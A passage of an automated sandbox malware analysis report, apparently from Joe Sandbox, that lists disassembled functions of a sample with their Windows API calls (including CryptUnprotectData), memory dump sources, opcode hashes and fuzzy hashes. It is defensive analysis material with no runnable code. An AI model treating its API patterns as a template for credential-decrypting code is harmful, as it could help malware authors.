                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: bfbad2b77a69c402403b1892e78fefe020d0d743696d16d414b33176467cd16a
                            • Instruction ID: 53a5aebd27011e5018923cd2c2c1fa01dd73d7c09461dd8a7a88bfc064526dfe
                            • Opcode Fuzzy Hash: bfbad2b77a69c402403b1892e78fefe020d0d743696d16d414b33176467cd16a
                            • Instruction Fuzzy Hash: 60017170604209BBDB10DFA6DC45B6B7BADEF45311F108059FD08C7350DA71D941DB60
                            Function 00D82B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00D8A3D0,000000FF), ref: 00D82B8F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00D82B96
                            • GetLocalTime.KERNEL32(?,?,00000000,00D8A3D0,000000FF), ref: 00D82BA2
                            • wsprintfA.USER32 ref: 00D82BCE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 227e7f1f0614bd8aa16e9eb2044c3890a5144388f4fffb5e332b76e3d11e37e5
                            • Instruction ID: 9dd58a9d443d9d175d2107cba7bf9fa06f002e3df34e1a7be5869e0213e523de
                            • Opcode Fuzzy Hash: 227e7f1f0614bd8aa16e9eb2044c3890a5144388f4fffb5e332b76e3d11e37e5
                            • Instruction Fuzzy Hash: 9D0140B2904128ABCB149BDADD45BBEB7BCFB4DB11F00011AF615A2290E7B95840D7B1
                            Function 00D69B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00D69B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D69B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00D69B61
                            • LocalFree.KERNEL32 ref: 00D69B70
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: 9eeb6068e3e02407cf341578ebc0864f8f1ba96cf5378cb77d443bfa9caa3f63
                            • Instruction ID: 261bff6b7d63b45d6978584292933c46edaace73ef54c4e52f8aa0092a0c262a
                            • Opcode Fuzzy Hash: 9eeb6068e3e02407cf341578ebc0864f8f1ba96cf5378cb77d443bfa9caa3f63
                            • Instruction Fuzzy Hash: 5CF01D703443126BFB301F69AC5AF967BACEF04B50F250119FA49EA2D0D7B09840CBA4
                            Function 0111F72A Relevance: 5.5, Strings: 3, Instructions: 1705COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %>{}$.s;O$hpjy
                            • API String ID: 0-1465181655
                            • Opcode ID: 061a93a30a79619e00136264946e31ef3fb3263c0615393f8d41d381e06a97b7
                            • Instruction ID: 834e5d876a7847eb4e10c19a8bc9f2a1487cb698c0f2326319c66a3f36c3825a
                            • Opcode Fuzzy Hash: 061a93a30a79619e00136264946e31ef3fb3263c0615393f8d41d381e06a97b7
                            • Instruction Fuzzy Hash: 2DB26CF360C210AFE304AE2DEC8567BBBD9EB94720F16863DEAC5C3744E93558058697
                            Function 00D7CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(00D8B110,00000000,00000001,00D8B100,?), ref: 00D7CB06
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00D7CB46
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 00D7CBC9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: cab06b2624e55f87cc4d82c13d097e370a30cac5c3fdc13509030192cc61750c
                            • Instruction ID: 7c5701cf16299a14221ab9ef8a61baa78496a06e0344f1f11592287b575f7bca
                            • Opcode Fuzzy Hash: cab06b2624e55f87cc4d82c13d097e370a30cac5c3fdc13509030192cc61750c
                            • Instruction Fuzzy Hash: B0317871A40218BFD710DB94CC96F9977B9DB88B10F104185FA14EB2D0D7B1AD45CBA0
                            Function 00D69B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D69B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00D69BB3
                            • LocalFree.KERNEL32(?), ref: 00D69BD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 7d7f22ecb5350af8e8bffe4939d217c794004d8d402ca12e6784af23dc58e7a4
                            • Instruction ID: a7f04c49fcaebb80082b9ac9b24814c99739c2d52ad557b9a12dd563b5163216
                            • Opcode Fuzzy Hash: 7d7f22ecb5350af8e8bffe4939d217c794004d8d402ca12e6784af23dc58e7a4
                            • Instruction Fuzzy Hash: 71011DB5A41309ABE7109BA8DC55FAEB77CEB44B00F104559EA04AB280D7B5AA048BE1
                            Function 01122EB9 Relevance: 2.9, Strings: 1, Instructions: 1676COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: XG?
                            • API String ID: 0-484424427
                            • Opcode ID: 3f020ded457366e8e1b84b37fc48d1b9eb923ea0d342275643ec32663ba8f5e8
                            • Instruction ID: 0b27ccc1f83e38aaa25471375ab56a1aa3bd1cc26e40e339fa07a20413fd174c
                            • Opcode Fuzzy Hash: 3f020ded457366e8e1b84b37fc48d1b9eb923ea0d342275643ec32663ba8f5e8
                            • Instruction Fuzzy Hash: 45B249F3A0C2149FE3046E2DEC8567ABBE9EF94620F1A453DEAC4C7744E63598058793
                            Function 0107E82F Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: B$gF=?
                            • API String ID: 0-3474495741
                            • Opcode ID: 236cd40991ccae9bf887313d8aad792573aef49db7a631e07328b46ac28d7cc7
                            • Instruction ID: a4a1699ceeb35b30771f23d4e5427f1d3e73ef7d099de9aca05d39dc03c4022a
                            • Opcode Fuzzy Hash: 236cd40991ccae9bf887313d8aad792573aef49db7a631e07328b46ac28d7cc7
                            • Instruction Fuzzy Hash: 214107F3A086149FE305AE19DC4677AF7EAEFD4320F1A842DD6C483780EA7458048796
                            Function 01037AD0 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Jy}
                            • API String ID: 0-3982173206
                            • Opcode ID: c932486f9a8f75ed1831956b93663879ba577d3a2685de2aba66ef586bd0a75c
                            • Instruction ID: 0491d9b08452c2d4cb054f70e747c1bf05b16745b0c5b3a5877f6e4221ec5cd6
                            • Opcode Fuzzy Hash: c932486f9a8f75ed1831956b93663879ba577d3a2685de2aba66ef586bd0a75c
                            • Instruction Fuzzy Hash: C5513BF7E053185BF310A92AEC447B7B787DBD0730F2A86399B5497788EC3958064291
                            Function 010C1584 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: w~
                            • API String ID: 0-3127576525
                            • Opcode ID: 55f9deb613625ff6a69278fff4a4788c750b5406f563a87eb8835d351534a133
                            • Instruction ID: 02630df6bfd35e99ee21d905df1c035a6ad78a75acd9f79fb6a5bbe3e7a59063
                            • Opcode Fuzzy Hash: 55f9deb613625ff6a69278fff4a4788c750b5406f563a87eb8835d351534a133
                            • Instruction Fuzzy Hash: FF5115B3E182285FE300BE68DC4577AB7D9DB94321F0B8A3DDA94D3784E9395C0482C2
                            Function 0108E09F Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: +H
                            • API String ID: 0-1675591692
                            • Opcode ID: f9cf297853e441550b4dbe312ba3725aabccb8347359b56d768d41699a3b98d0
